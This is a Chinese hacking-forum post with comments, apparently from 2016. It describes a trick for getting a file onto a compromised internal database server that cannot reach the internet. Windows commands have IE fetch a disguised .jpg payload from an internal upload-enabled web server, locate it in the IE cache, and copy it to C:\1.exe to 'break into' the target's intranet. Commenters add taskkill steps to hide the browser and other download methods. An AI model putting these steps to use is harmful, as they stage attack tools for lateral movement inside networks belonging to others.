一个奇葩的内网写入文件方法

2016-07-27 10:24:51 70 6721


引用90sec探讨的问题


找到一个可以上传图片的web站点。
"C:\Program Files\Internet Explorer\iexplore.exe" http://内网可以访问的站点/0/09/40/75/91ef76c6a7efce1bee5deaebac51f3deb48f6598.jpg 
执行访问后会有缓存文件。
然后 cd 到C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files>
执行dir /s /w 91ef76c6a7efce1bee5deaebac51f3deb48f6598*.*   找到路径
接下来就是
 type 路径>C:\1.exe  应该可以突破他内网了。

关于作者

刘海哥5篇文章100篇回复

评论70次

要评论?请先  登录  或  注册
  • 70楼
    2020-6-18 22:55

    想法比较新颖

  • 69楼
    2020-6-18 22:40

    这个姿势厉害了! 但是我碰到的情况是,只能正向访问到服务器,服务器不能访问我。

  • 68楼
    2016-12-6 19:37

    收下了~看看姿势

  • 67楼
    2016-12-6 18:45

    最后传的是个图片马?

  • 66楼
    2016-12-6 14:13

    看看学xi一下 谢谢分享

  • 65楼
    2016-12-5 20:53

    教我们阿菜具体的代码审计吧

  • 64楼
    2016-11-14 14:05

    算的一种技巧,能执行命令就可以 echo ftp vbs down 感觉比这好点

  • 63楼
    2016-11-14 11:16

    楼主是说用IE的缓存机制吗?

  • 62楼
    2016-11-14 10:34

    看得一愣一愣的,没配图有点晕

  • 61楼
    2016-11-14 10:14

    测试发现IE会弹窗。

  • 60楼
    2016-11-14 08:51
  • 59楼
    2016-11-13 14:41

    有些不太明白 是具体有什么权限 才可以这么搞?

  • 58楼
    2016-11-12 22:13

    好像在哪看到过了

  • 57楼
    2016-11-12 21:54

    没看懂呢

  • 56楼
    2016-11-12 16:49

    刚才试了下,你的方法能找到缓存,但是会弹出ie。 建议结束后找到进程 tasklist | find ”iexplo“ 然后杀掉ie taskkill /pid 1234 /pid 1236 /t

  • 55楼
    2016-8-11 09:54
    Mir4cl3

    环境是一个dbserver cmd权限 加一个存在上传的、db可访问的 webserver ,dbserver不连外网,需要db 拿到权限,通过访问webserver的图片生成在缓存然后可以改后缀执行程序。但是笔者的环境中db不连外网,执行木马的话又不能直接外连,请问有啥用???

    1
    刘海哥

    看来你也是没看明白。 我以我遇到的情况下来说:一个注入sa权限(访问不了外网)来说。站库分离。 web 上面有一个可以上传图片的。我通过这个上传后吧我想要上传的东西 (在web上面(猜测这个站库分离的服务器可以访问这个web) 经过利用那个玩意吧这东西,搞都不可以访问外网的机器上面去。然后你要利用工具达到目的就行。(难道在你们眼中的渗透非得提权?...)

    2
    Mir4cl3

    我环境理解正确,你意思就是不上马,直接传工具,通过sa执行命令继续内网渗透呗;这样做内网太费事,有这时间,web都搞下来了。

    3

    如果你遇到站库分离而且 数据库服务器没办法联外网(web getshell不了(就有一个注入sa权限!)。你如何上传东西进去渗透呢。(我不太会哈哈

  • 54楼
    2016-8-11 09:41
    Mir4cl3

    环境是一个dbserver cmd权限 加一个存在上传的、db可访问的 webserver ,dbserver不连外网,需要db 拿到权限,通过访问webserver的图片生成在缓存然后可以改后缀执行程序。但是笔者的环境中db不连外网,执行木马的话又不能直接外连,请问有啥用???

    1
    刘海哥

    看来你也是没看明白。 我以我遇到的情况下来说:一个注入sa权限(访问不了外网)来说。站库分离。 web 上面有一个可以上传图片的。我通过这个上传后吧我想要上传的东西 (在web上面(猜测这个站库分离的服务器可以访问这个web) 经过利用那个玩意吧这东西,搞都不可以访问外网的机器上面去。然后你要利用工具达到目的就行。(难道在你们眼中的渗透非得提权?...)

    2

    我环境理解正确,你意思就是不上马,直接传工具,通过sa执行命令继续内网渗透呗; 这样做内网太费事,有这时间,web都搞下来了。

  • 53楼
    2016-8-10 10:14
    核攻击

    vbs,powershell,echo 都可以,不过这方法确实奇葩。

    1

    powershell 和vbs 不太会。echo不知道怎么写exe...

  • 52楼
    2016-8-10 10:02

    vbs,powershell,echo 都可以,不过这方法确实奇葩。

  • 51楼
    2016-8-10 09:54
    Mir4cl3

    环境是一个dbserver cmd权限 加一个存在上传的、db可访问的 webserver ,dbserver不连外网,需要db 拿到权限,通过访问webserver的图片生成在缓存然后可以改后缀执行程序。但是笔者的环境中db不连外网,执行木马的话又不能直接外连,请问有啥用???

    1

    看来你也是没看明白。 我以我遇到的情况下来说:一个注入sa权限(访问不了外网)来说。站库分离。 web 上面有一个可以上传图片的。我通过这个上传后吧我想要上传的东西 (在web上面(猜测这个站库分离的服务器可以访问这个web) 经过利用那个玩意吧这东西,搞都不可以访问外网的机器上面去。然后你要利用工具达到目的就行。(难道在你们眼中的渗透非得提权?...)